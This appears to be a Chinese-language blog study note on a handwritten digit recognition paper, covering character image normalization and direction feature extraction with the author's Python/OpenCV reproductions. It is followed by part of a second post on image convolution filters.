        • 参数(parametric)和非参数(nonparametric)统计分类(statistical classifiers)
        • 神经网络(neural networks)
        • 支持向量机(support vector machines, SVMS)
        • 混合分类器(hybrid classifiers)

    ​ 对于 pre-processing,我们已经证明了字符图像的归一化对识别性能有重要的影响,提出了长宽比自适应归一化(ARAN)策略来提高识别性能。


    ​ 对于 feature extraction,重点研究了 ARAN 实现的多样性(the diversity of implementation)和方向特征提取(direction feature extraction)。

    ​ ARAN 的性能取决于纵横比映射函数(aspect ratio mapping function)。

    ​ direction feature 是 character recognition 中最常用的特征。其性能在很大程度上取决于特征的表示(representation of feature)和提取技术(extraction technique)。

    ​ 特征向量表示表示链码(chaincodes)或梯度(gradients)的方向分布。

    ​ 新的特征向量旨在提高 NCFE(normalization-cooperated feature extraction)的性能。


    Normalization 被认为是字符识别中最重要的预处理因素。

    ​ 通常,字符图像通过**插值(interpolation)/ 外推(extrapolation)线性映射(linearly mapped)**到一个标准平面上。

    ​ 通过线性映射,除了纵横比变化外,字符形状不会变形。

    • **透视变换(perspective transformation)**试图纠正字符宽度的不平衡。

    • 矩归一化(moment normalization) 试图纠正旋转或倾斜(slant)。

    • **非线性归一化(nonlinear normalization)**用于均衡线密度(equalize the line density)。

    • **倾斜归一化(slant normalization)**可以通过上下文(context)来估计,而不是 moments。


    Feature extraction 是字符识别的核心。

    • 局部行程方向分布(distribution of local stroke direction)(direction feature)用于其高性能和易于实现而被广泛应用。

    • **局部描边方向(local stroke direction)**可以通过:

      • skeleton 骨骼

      定义:对于给定的文字图像,找出其骨架(Skeleton)线的处理称为细化处理。

      作用:骨架线指文字图像线宽的中心线,其宽度为 1 bit。失去了笔画宽度信息,但保留了文字结构信息,有利于笔画特征的提取,是提取结构特征的基础。

      • chaincode 链码
      • gradient 梯度

      来测量。

    • chaincode feature 被广泛采用

    • gradient feature 适用于灰度图像和二值图像。

    • 为了增强方向特征的识别能力,提出了一些互补特征(complementary features):如

      • structural and curvature feature(结构特征和凹面特征)
      • profile shape feature(廓形特征)
      • curvature feature(曲率特征)

    ​ 另一方面,所谓的归一化协同特征提取(normalization-cooperated feature extraction, NCFE)方法是从归一化图像之外的原始图像提取方向特征。


    ​ 我们之前评估了手写字符识别中的一些统计(statistical)和神经分类器(neural classifiers),并发现一些分类器在低复杂度下具有很高的准确性。

    ​ SVM 在分类精度方面具有优势,但计算成本非常高。

    ​ 为了测试归一化(normalization)和特征提取技术(feature extraction techniques)的性能,我们使用了三个具有较高精度的分类器:

    • 多项式分类器(polynomial classifier)
    • 判别学习二次判别函数(discriminative learning quadratic discriminant function, DLQDF)
    • 径向基函数核(SVC-rbf)支持向量分类

    • $8$ 个特征向量
      • 基本特征类型(basic feature types)
        • chaincode feature 链码特征
        • profile shape feature 廓型特征
        • NCFE 特征
        • gradient feature 梯度特征
      • 对 NCFE 的两种改进版本:
        • enhanced NCFE with profile shape feature 增强的 NCFE 与轮廓形状特征
        • 连续 NCFE

    • $3$ 个数据库
      • CENPARMI
      • NIST
      • Hitachi

    ​ 基于 $10$ 个归一化函数 和 $8$ 个特征向量的组合给出了 $80$ 个 classification accuracies。

    ​ 此外,每个特征向量根据方向的分辨率有两种变化:$4$ 个方向和 $8$ 个方向,分别评估。


    ​ 文章结构:

    • 第 2 节描述了规范化策略;
    • 第 3 节描述了特征提取技术;
    • 第 4 节给出实验结果;
    • 第 5 节给出结论。

    2 Normalization techniques

    2.1 Implementation of normalization 归一化的实施

    ​ 为了便于特征提取和分类,归一化图像平面(标准平面)的 $x/y$ 维数(大小)是固定的。

    ​ 然而,在纵横比自适应归一化(ARAN)中,标准平面的维度不一定是填充的。

    ​ 根据纵横比,归一化图像以一维填充的平面为中心。
    假设标准平面为正方形,边长用 $L$表示。将归一化字符图像的宽度和高度分别表示为 $W_2$ 和 $H_2$,纵横比定义为

    $$R_2=\left{\begin{matrix}
    W_2/H_2, \mathrm{if}\ W_2<H2\H_2/W_2,\mathrm{otherwise.}
    \end{matrix}\right.$$

    ​ 如果归一化图像填充一维,则 $\max(W_2, H_2) = L$。但是,在字符图像质心对准标准平面中心的矩归一化中,归一化图像不一定填充一维,可能会超出标准平面。在这种情况下,$W_2$和 $H_2$ 不由 L 决定,将标准平面外的图像部分截断。


    ​ 在 ARAN 的实现中,将规范化的字符图像填充到另一个尺寸为 $W_2 \times H_2$ 的柔性平面中,然后通过对齐边界或质心将该柔性平面平移至与标准平面重叠。
    ​ 在下面,我们将演示如何将大小为 $W_1 \times H1$ 的字符图像转换为大小为 $W_2 \times H_2$ 的规范化图像。转换可以通过正向映射或反向映射来完成。
    将原图像和归一化后的图像分别表示为 $f(x, y)$ 和 $g(x’, y’)$,归一化后的图像由 $g(x’, y’) = f(x, y)$ 基于坐标映射生成。
    ​ 正向映射(forward mapping)和反向映射(backward mapping)由 $x’=x’(x,y),y’=y’(x,y)$ 和 $x=x(x’,y’),y=y(x’,y’)$分别给出。

    ​ 我们描述各种归一化方法的坐标映射(coordinate mapping of various of various normalization methods),然后解决像素的插值问题(interpolation of pixels)。

    • 线性归一化(linear normalization)
    • 矩归一化(moment normalization)
    • 斜归一化(slant normalization)
    • 非线性归一化(nonlinear normalization)

    的正向映射(forward mapping)和反向映射见表1。

    Coordinate mapping of various normalization methods
    各种归一化方法的坐标映射
    MethodForward mappingBackward mapping
    Linear$x’=\alpha x$
    $y’=\beta y$
    $x=x’/\alpha$
    $y=y’/\beta$
    Moment$x’=\alpha (x-x_c)+x’_c$
    $y’=\beta (y-y_c)+y’_c$
    $x=(x’-x’_c)/\beta+x_c$
    $y=(y’-y’_c)/\beta+y_c$
    Slant$x’=x-(y-y_c)\tan\theta$
    $y’=y$
    $x=x’-(y+y_c)\tan\theta$
    $y=y’$
    Nonlinear$x’=W_2h_x(x)$
    $y’=H_2h_y(y)$
    $x=h_x{-1}(x’/W_2)$<br/>$y=h_y{-1}(y’/H_2)$
    • 其中,$\alpha$ 和 $\beta$ 表示变化比(ratios of transformation):

      • $\alpha=W_2/W_1$

      • $\beta=H_2/H_1$

    • moment normalization 是指不旋转的线性变换,归一化图像的中心和大小由矩决定。

    • 在基于 moments 的 slant normalization,倾斜角度由二阶矩计算:

      • $\tan\theta=\frac{\mu_{11}}{\mu_{02}}$
      • 其中,$\mu_{pq}=\sum_x\sum_y(x-x_c)p(y-y_c)qf(x,y)$(中心距)
    • 对于 nonlinear normalization,$h_x$ 和 $h_y$ 表示归一化后的累计线密度直方图(line density histograms)。

    • 在 forward mapping 中,$x$ 和 $y$ 是离散的,但 $x’(x,y)$ 和 $y’(x,y)$ 不一定是离散的。

    • 在 backward mapping 中,$x’$ 和 $y’$ 是离散的,但 $x(x’,y’)$ 和 $y(x’,y’)$ 不一定是离散的。

    • 在 forward mapping 中,所映射的坐标表示 $(x’,y’)$ 不一定填满归一化平面中的所有像素。因此在实现归一化时,需要进行坐标离散(coordinate discretization)或像素插值(pixel interpolation)


    ​ 所有(original)字符图像都具有二值灰度(binary gray levels)。

    ​ 我们使用坐标离散化(coordinate discretization)生成二进制归一化图像(binary normalized images)。

    ​ 使用像素插值(pixel interpolation)生成灰度归一化图像(gray-scale normalized images)。

    • 通过 discretization,映射的坐标 $(x’,y’)$ 或 $(x,y)$ 近似为最接近的整数 $([x’],[y’])$ 或 $([x],[y])$
    • 在 the discretization of backward mapping 中,离散坐标 $(x’,y’)$ 扫描归一化后的像素平面和灰度 $f([x],[y])$ 分配给 $g(x’,y’)$。
    • 在 discretization of forward mapping 中,离散坐标 $(x,y)$ 扫描原始图像的像素,灰度 $f(x,y)$ 被赋给从 $([x’(x)],[y’(y)])$ 到 $([x’(x+1)],[y’(y+1)])$。

    ​ 在反向映射生成灰度图像的插值(interpolation of backward mapping for generating gray-scale)中:

    • 映射位置(mapped position)$(x,y)$ 被四个离散的像素包围。
      • 灰度 $g(x’,y’)$ 是四个像素值的加权组合。

    ​ 在前向映射插值生成灰度图像时,将原图像和归一化图像中的每个像素看作一个单位面积的平方。
    ​ 通过坐标映射,将原图像的单位正方形映射到归一化平面上的矩形。

    jpg

    ​ 如图所示,在归一化平面中,每个与矩形重叠的单元正方形都被赋予与重叠面积成比例的灰度。

    2.2 Aspect radio mapping 纵横比映射

    ​ 为了实现归一化,需要确定归一化图像的宽度 $W_2$ 和高度 $H_2$。我们假设 $\max(W_2,H_2)$ 等于标准平面的边长 $L$。而 $\min(W_2,H_2)$由$R_2=\left{\begin{matrix}
    W_2/H_2, \mathrm{if}\ W_2<H2\H_2/W_2,\mathrm{otherwise.}
    \end{matrix}\right.$ 中的纵横比决定,归一化后的图像纵横比与原始图像的纵横比相适应。因此长宽比映射函数决定了归一化图像的大小和形状。

    • 基于 dimension 的归一化,以实际图像的宽度和高度作为尺寸。

    • 基于 moment 的归一化,

      • 原始图像的重心被设为中心点
      • 边界被重新设置为 $[x_c-2\sqrt{\mu_{20}},x_c+2\sqrt{\mu_{20}}]$ 和 $[y_c-2\sqrt{\mu_{02}},y_c+2\sqrt{\mu_{02}}]$
      • 尺寸被重新设置为 $W_1=4\sqrt{\mu_{20}}$ 和 $H_1=4\sqrt{\mu_{02}}$
        • 其中,$\mu_{pq}=\sum_x\sum_y(x-x_c)p(y-y_c)qf(x,y)$

      图像的矩归一化是图像预处理的一种方法,相对于直接的线性归一化,矩归一化的优势在于它利用了图像的矩信息,将原图像归一化到幕布大小的同时使得原图的中质心与幕布的中心对齐,同时尽可能的去除了原图中的边界区域(margin)。图像矩归一化_夜半罟霖的博客-CSDN博客_图像矩阵归一化

      图像平面被扩展或修建,以便适应在范围内。

      • 计算原始图像的纵横比:$R_1=\left{\begin{matrix}
        W_1/H_1, \mathrm{if}\ W_1<H_1\H_1/W_1,\mathrm{otherwise.}
        \end{matrix}\right.$
    • 改变归一化策略和纵横比映射函数,10 个归一化函数如下所示。

    序号描述公式
    $F0$固定长宽比(拉伸)$R_2=1$
    $F1$保留长宽比$R_2=R_1$
    $F2$长宽比的平方根$R_2=\sqrt{R_1}$
    $F3$长宽比的立方根$R_2=\sqrt[3]{R_1}$
    $F4$分段线性长宽比$R_2=\left{\begin{matrix} 0.25+1.5R_1, \mathrm{if}\ R_1<0.5\1,\mathrm{otherwise.}\end{matrix}\right.$
    $F5$长宽比的正弦值的平方根$R_2=\sqrt{\sin\left(\frac{\pi}{2}R_1\right)}$
    $F6$$F5$ 的 nonlinear 归一化,线密度直方图计算采用的方法
    $F7$保留长宽比的 moment 归一化
    $F8$长宽比平方根的 moment 归一化
    $F9$长宽比立方根的 moment 归一化

    ​ $F0$-$F5$如图所示,其中 $F4$、$F5$ 优于 $F0$。

    jpg

    ​ 所有的归一化函数都是通过正向映射来实现的。图 3 为归一化函数对应的同一原始图像。

    jpg

    ​ 图 4 为对应的同一原始图像和归一化后的二值图像和灰度图像。

    jpg

    ​ 标准归一化平面尺寸为 $35\times 35$,当归一化图像的长宽比与原始长宽比偏离较大时,字符形状的变形也是相当大的。(如 $F0$ 和 $F5$)

    ​ 对于基于矩的归一化($F7$,$F8$ 和 $F9$),归一化图像在中心点居中,标准平面的任何维度都不被填充。


    ​ 使用 Python 尝试代码复现 $F0$ - $F5$:

    1
    2
    3
    4
    5
    import cv2
    import numpy as np
    import matplotlib.pyplot as plt

    img = cv2.imread('9.png', 0)
    1
    img.shape
    (76, 35)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    H2 = 35
    W2 = 35


    def R1(img):
    if img.shape[0] < img.shape[1]:
    return img.shape[0] / img.shape[1]
    else:
    return img.shape[1] / img.shape[0]


    def F0(img):
    ans = cv2.resize(img, (H2, W2))
    return ans


    def F1(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img))))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F2(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img) ** 0.5)))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2 - ans.shape[0]) / 2), (H2 - ans.shape[0]) // 2,
    (W2 - ans.shape[1]) // 2, round((W2 - ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans


    def F3(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img) ** (1 / 3))))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img) ** (1 / 3)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F4(img):
    if R1(img) >= 0.5:
    return F0(img)
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * (R1(img) * 1.5 + 0.25))))
    else:
    ans = cv2.resize(img, (round(H2 * (R1(img) * 1.5 + 0.25)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F5(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * (sin(R1(img) * np.pi / 2)) ** 0.5)))
    else:
    ans = cv2.resize(img, (round(H2 * (np.sin(R1(img) * np.pi / 2)) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    fig = plt.figure(figsize=(9, 3))

    ax = fig.add_subplot(1, 6, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')
    for i in range(6):
    if i < 5:
    p = i + 2
    else:
    p = i + 3
    exec("ax" + str(i) + "=fig.add_subplot(2, 6, " + str(p) + ")")
    plt.xticks([])
    plt.yticks([])
    exec("ax" + str(i) + ".imshow(F" + str(i) + "(img), cmap='gray')")
    exec("ax" + str(i) + ".title.set_text('F" + str(i) + "')")
    plt.show()

    png

    3 Feature extraction techniques 特征提取技术

    • 我们提取了三种类型的方向特征:

    • 根据是否使用 slant normalization,chaincode feature 有两种变换。

    • 对于 chaincode feature 和 gradient feature extraction,将归一化后的图像分解为 $4$ 个方向平面或 $8$ 个方向平面。

    • 在 NCFE 中,原始图像的边缘像素直接映射到 $4$ 向或 $8$ 向平面上。

    • 对于 feature measuring,将每个特征平面(feature plane)划分为均匀的区域(uniform zones),并将每个区域的强度累积为一个测量值,或将模糊掩膜(blurring masks)与该平面进行卷积以给出测量值。

    • 带模糊掩膜的卷积相当于低通滤波(low-pass filtering)和采样(sampling)。通常,使用高斯掩膜:$h(x,y)=\frac{1}{2\pi \sigma2_x}\exp\left(-\frac{x2+y2}{2\sigma2_x}\right)$

      • 其中 $\sigma_x$ 与模糊掩膜之间的间隔有关,可以看作是采样间隔(sampling interval),是采样频率的倒数(the reciprocal of sampling frequency)。

        经验公式 $\sigma_x=\frac{\sqrt 2t_x}{\pi}$

        • 其中 $t_x$ 是 $x$ 轴和 $y$ 轴模糊蒙版(blurring masks)
      • 在中心 $(x_0,y_0)$ 的模糊掩膜,卷积给出了一个测量值:$F(x_0,y_0)=\sum_x\sum_yf(x,y)h(x-x_0,y-y_0)$

    使用 Python 复现高斯掩膜:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    img_f = cv2.GaussianBlur(img, (7, 7), -1)

    fig = plt.figure(figsize=(4, 4))
    ax = fig.add_subplot(1, 2, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')

    ax_f = fig.add_subplot(1, 2, 2)
    plt.xticks([])
    plt.yticks([])
    ax_f.imshow(img_f, cmap='gray')
    ax_f.title.set_text('GaussianBlur')

    plt.show()

    png

    • 在 chaincode feature extraction 中,将归一化图像的轮廓赋给 $8$ 方向码:

      jpg

      并将每个方向的轮廓像素赋给相应的方向平面。链码的分配可以在图像的光栅扫描(raster scan of the image)中完成,无需轮廓跟踪(contour tracing)。在这个过程中,一个具有多个连接的像素可以被分出多个 chaincodes。若要提取 $4$ 方向特征,则将每对相反方向的平面合并为一个特征平面,并对 $4$ 个平面进行模糊处理。


    • 对于 NCFE,原始图像中的每一个 chaincode 都被视为是一个线段,该线段被映射到标准平面方向平面上的另一个线段。

    • 在 direction plane 上,每个与线段在主方向($x$ 或 $y$)上相交的网格单元都被赋予了一个方向贡献单位。

    • 由于线段对网格单元的覆盖不是离散的,我们在此提出了一种基于连续特征平面的改进的 NCFE 方法。

    • 在 continuous plane 上,像素被视为一个正方形,方向长度与落在这个正方形中的线段长度成正比。

    jpg

    • 如图 6 所示,从链码映射的线段覆盖了 4 个单元 A、B、C、D。
      • 通过离散的 NCFE,$A$ 和 $C$ 被分配成一个一个方向单元。
      • 通过连续的 NCFE,所有 $4$ 个单元都被分配与单元线段长度成比例的方向强度。
    • 注意,对于 NCFE,有时平滑字符图像是必要的,以便 chaincode 更好地解释笔画方向。

    ​ gradient feature extraction 中,采用 Sobel 算子计算梯度的 $x/y$ 分量。将梯度图像分解为 4 个方向平面或 8 个方向平面。其他学者也使用 Roberts 算子和 Kirsh 算子。

    jpg

    ​ 梯度 $\mathbf{g}(x,y)=[g_x,g_y]^T$,位置 $(x,y)$:

    • $g_x(x,y)=f(x+1,y-1)+2f(x+1,y)+f(x+1,y+1)-f(x-1,y-1)-2f(x-1,y)-f(x-1,y+1)$

    • $g_y(x,y)=f(x-1,y+1)+2f(x,y+1)+f(x+1,y+1)-f(x-1,y-1)-2f(x,y-1)-f(x+1,y-1)$

    使用 Python 复现 Sobel masks:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    kernel_x = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
    kernel_y = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])
    img_x = cv2.filter2D(img, cv2.CV_8UC3, kernel_x)
    img_y = cv2.filter2D(img, cv2.CV_8UC3, kernel_y)

    fig = plt.figure(figsize=(4, 4))
    ax = fig.add_subplot(1, 2, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')

    ax_x = fig.add_subplot(2, 2, 2)
    plt.xticks([])
    plt.yticks([])
    ax_x.imshow(img_x, cmap='gray')
    ax_x.title.set_text('x')

    ax_y = fig.add_subplot(2, 2, 4)
    plt.xticks([])
    plt.yticks([])
    ax_y.imshow(img_y, cmap='gray')
    ax_y.title.set_text('y')

    plt.show()

    png


    ​ 梯度强度和方向可以从向量 $[g_x,g_y]^T$ 得出.对于字符特征提取,计算归一化图像上每个像素的梯度。梯度方向的范围被划分为若干个区域(比如 $8$ 个或 $16$ 个),每个区域对应一个方向平面。每个像素被分配到一个方向区域,梯度强度贡献相应平面的强度。然而,在我们的实验中,我们采用了另一种策略,即将每个梯度向量分解为标准方向上的分量。

    ​ 该策略曾用于在线字符识别的特征提取。我们将梯度向量分解成八个链码方向。如果梯度方向位于两个标准方向之间,则在两个标准方向上分解为两个分量,如图 8。

    jpg

    ​ 梯度特征可以从二进制或灰度归一化图像中提取。从一个二值字符图像,灰度归一化图像是通过前向二值到灰度像素映射生成的。我们也称这种方法生成的灰度图像为伪灰度图像。伪灰色图像的梯度特征是对二值图像梯度特征的改进。


    ​ 为了增强方向特征的识别能力,我们将结构特征和形状特征作为互补特征。结构特征表示为水平交叉计数,而形状特征表示为最外边缘与凸包之间的距离。交叉计数和距离序列也通过一维高斯掩模进行模糊处理,以给出特征测量。由于归一化平面设置为 $35 \times 35$ 像素,序列的长度为 $35$。我们提取了 $11$ 个模糊的水平交叉计数和 $22$ 个(左和右)正面形状测量。这些测量值被添加到模糊链码特征中,以形成增强的特征向量。


    ​ NCFE 功能还可以通过补充功能来增强。采用 NCFE 方法计算交叉计数和轮廓形状距离,并将其映射到标准平面上。然后,它们被模糊,以给出 $11 + 22$ 个测量值,以添加到 NCFE 方向特征中。增强的 NCFE 特征以及连续的 NCFE 特征可以被视为对现有 NCFE 方法的改进。


    ​ 在我们的实验中,我们测试了八个方向特征或增强的特征向量。每个特征向量有 4 个方向和 8 个方向。
    特征向量如下所示。

    特征向量描述$4$ 方向$8$ 方向
    blrblurred chaincode feature,在每个特征平面上,均匀放置 $5×5$ 高斯掩模来计算 $25$ 个测量值。100D200D
    desdeslant chain feature,对原始图像进行去噪和归一化,提取链码特征。100D200D
    mulenhanced chaincode feature with complementary(互补的)features.133D233D
    ncfdiscrete NCFE direction feature.100D200D
    ncf-pdiscrete NCFE direction feature plus complementary features.133D233D
    ncf-ccontinuous NCFE direction feature.100D200D
    grdgradient feature from binary images(二值图像的梯度特征).100D200D
    grd-ggradient feature from pseudo gray-scale images(伪灰度图像的梯度特征).100D200D

    ​ 为了修改特征分布以提高分类性能,对特征向量中的所有测量值进行变量变换 $y=x^p$。这个变换也被称为 Box-Cox 变换。为了计算方便,我们在实验中没有对功率参数进行优化,而是设置为 $p=0.5$。

    4 Experimental results

    4.1 Reults on CENPARMI database

    ​ CENPARMI (加拿大康科迪亚大学)的手写数字数据库包含 6000 张数字图像(10 个班级各 600 张图像),从美国邮政的实时邮件中收集,扫描为 166DPI。
    ​ 在数据库中,4000 张图像被指定用于训练,剩下的 2000 张图像用于测试。


    ​ 使用了两种分类:

    • 多项式分类器 polynomial classifier(PC)
    • 径向基函数核支持向量分类器 support vector classifier with radial basis function kernel(SVC-rbf)

    $$RPM=\frac{100AER}{\min(AER)}$$

    其中 $AER$ 表示平均错误率。

    $RPM$ 的倒数对应 ratio of error rate between the best method and an alternative method.

    • 当 ratio of error rate $\ge0.9$ 时(对应的 $RPM\le111.1$),我们认为备选方法 competitive to the best one。
    • 当 ratio of error rate $\ge0.8$ 时(对应的 $RPM\le125$),我们认为备选方法 is good。
    • 当 $0.7\le$ ratio of error rate $<0.8$ 时($125<RPM\le142.9$),我们认为备选方法 is fair。
    • ratio of error rate $<0.7$($RPM>142.9$)说明替代方法性能较差。

    ​ $F0$,$F2$,$F4$,$F9$ 表现最好,保留纵横比的 $F1$ 和 $F7$ 效果较差。

    4.2 Results on NIST database

    ​ 我们利用 NIST 特殊数据库19 (SD19)的光盘制作了一个实验数据库。训练数据集由600位作者的数字样本组成。(no.0–399 and no.2100 –2299),测试数据集由400位作者的数字样本组成。(no.500–699 andno.2400 –2599)。训练数据集和测试数据集的样本总数分别为66,274和45,398。图像以300DPI扫描。
    ​ NIST数据库的字符图像存在大量的轮廓噪声,因此对 NCFE 进行平滑是必要的。
    ​ 在NIST数据库的识别中采用

    • 多项式分类器 polynomial classifier(PC)

    • 判别学习二次判别函数(DLQDF)两类方法。


    • 特征向量 decgrd-g 在四种表现最好。
    • ncf-pncf-c 相对于 ncf 优势明显。

    4.3 Results on Hitachi database

    ​ 为了测试对日立公司收集的数据库对日文字体的识别性能。样本采集自样本表和真实表格(保险申请、银行交易等)图像,扫描精度为 200DPI。训练数据集包含 164,158 个样本,我们用这些样本来训练具有 80 个主成分的 PC。


    • $F0$,$F2$,$F3$,$F4$,$F5$,$F9$ 表现最好,保留纵横比的 $F1$ 和 $F7$ 效果较差。
    • des 的性能较差,可能是因为在日语风格写作中,数字图像的倾斜度并不大。

    4.4 Speed of feature extraction

    ​ $8$ 方向特征要比 $4$ 方向特征花费更多时间。

    ​ $F6$ 要花费更多时间。

    5 Conclusion

    ​ 我们在不同来源的大型数据库上比较了十个归一化函数和八个特征向量在手写数字识别中的性能。标准化函数实现了基于维度的线性/非线性标准化和具有变化纵横比映射的基于度量的标准化。识别结果表明,矩归一化函数F8和F9的分类精度最高。纵横比映射对基于维度和基于矩的归一化的识别性能都有影响。

    心得

    ​ 这是一篇关于文字识别的论文,主要讲述了文字识别中,对文字图像数据的处理中归一化和特征提取方面的内容。我尝试对论文中的部分内容进行代码复现,在看论文和代码复现的过程中,学习到了不少数字图像处理方面的知识,了解到了一些新概念——链码,图像的重心,图像的矩等。通过特征工程,以提高在机器学习中的准确率。

    ]]>
    @@ -8901,7 +8901,7 @@ /posts/DIP-Convolutions%20in%20image%20processing/ - 参考

    正文

    卷积运算

    • 连续卷积:

    $$(f*g)(t):=\int_{-\infty}^{+\infty} f(x)\cdot g(t-x)dx$$

    gif

    • 离散卷积:

    $$\sum_{m=-M}^{M} f[n-m]g[m]$$

    点对点相乘,再相加

    jpg

    使相乘后的数据拥有周边数据的一些特征:

    jpg

    在数字图像处理中的应用

    import cv2
    import matplotlib.pyplot as plt
    import numpy as np

    img = cv2.imread('images/tom_in_bowtie.jpg')
    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11b90d760>

    png

    img.shape
    (500, 399, 3)
    def plot(array):
    print(array)
    plt.matshow(array, cmap='Wistia')
    plt.colorbar()
    for x in range(len(array)):
    for y in range(len(array)):
    plt.annotate(round(array[x, y], 3),xy=(x,y),horizontalalignment='center',
    verticalalignment='center')
    return plt

    均值滤波

    jpg

    kernel = np.ones((3, 3)) / 9
    plot(kernel)
    [[0.11111111 0.11111111 0.11111111] [0.11111111 0.11111111 0.11111111] [0.11111111 0.11111111 0.11111111]]<module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11c0d0af0>

    png

    高斯模糊

    jpg

    定义高斯卷积核,$\sigma$ 为标准差

    $$G(x,y)=\frac{1}{2\pi\sigma2}\exp\left(-\frac{x2+y2}{2\sigma2}\right)$$

    $$G(x,y)=\frac{1}{2\pi\sigma_x\sigma_y}\exp\left[-\left(\frac{x2}{2\sigma2_x}+\frac{y2}{2\sigma2_y}\right)\right]=\frac{1}{\sqrt{2\pi}\sigma_x}\exp\left(-\frac{x2}{2\sigma2_x}\right)\cdot \frac{1}{\sqrt{2\pi}\sigma_y}\exp\left(-\frac{y2}{2\sigma2_y}\right)=G(x)\cdot G(y)$$

    def gaussian_kernel_2d(ksize, sigma):
    return cv2.getGaussianKernel(ksize, sigma) @ cv2.getGaussianKernel(ksize,sigma).T
    kernel = gaussian_kernel_2d(7, -1)
    plot(kernel)
    [[0.00097656 0.00341797 0.00683594 0.00878906 0.00683594 0.00341797  0.00097656] [0.00341797 0.01196289 0.02392578 0.03076172 0.02392578 0.01196289  0.00341797] [0.00683594 0.02392578 0.04785156 0.06152344 0.04785156 0.02392578  0.00683594] [0.00878906 0.03076172 0.06152344 0.07910156 0.06152344 0.03076172  0.00878906] [0.00683594 0.02392578 0.04785156 0.06152344 0.04785156 0.02392578  0.00683594] [0.00341797 0.01196289 0.02392578 0.03076172 0.02392578 0.01196289  0.00341797] [0.00097656 0.00341797 0.00683594 0.00878906 0.00683594 0.00341797  0.00097656]]<module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    sum(sum(kernel))
    1.0

    应用高斯滤波

    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2abcbef70>

    png

    等效于

    fimg = cv2.GaussianBlur(img, (7, 7), -1)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2aa6a6910>

    png

    锐化

    kernel = np.array([[-0.5, -1.0, -0.5],
    [-1.0, 7.0, -1.0],
    [-0.5, -1.0, -0.5]])
    plot(kernel)
    [[-0.5 -1.  -0.5] [-1.   7.  -1. ] [-0.5 -1.  -0.5]]0 0 -0.50 1 -1.00 2 -0.51 0 -1.01 1 7.01 2 -1.02 0 -0.52 1 -1.02 2 -0.5<module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    sum(sum(kernel))
    1.0
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2a9376fd0>

    png

    边缘检测

    jpg

    # 我也不知道这里为什么第二行显示的都是 0.0...
    kernel = np.array([[-0.125, 0.0, 0.125],
    [-0.25, 0.0, 0.25],
    [-0.125, 0.0, 0.125]])
    plot(kernel)
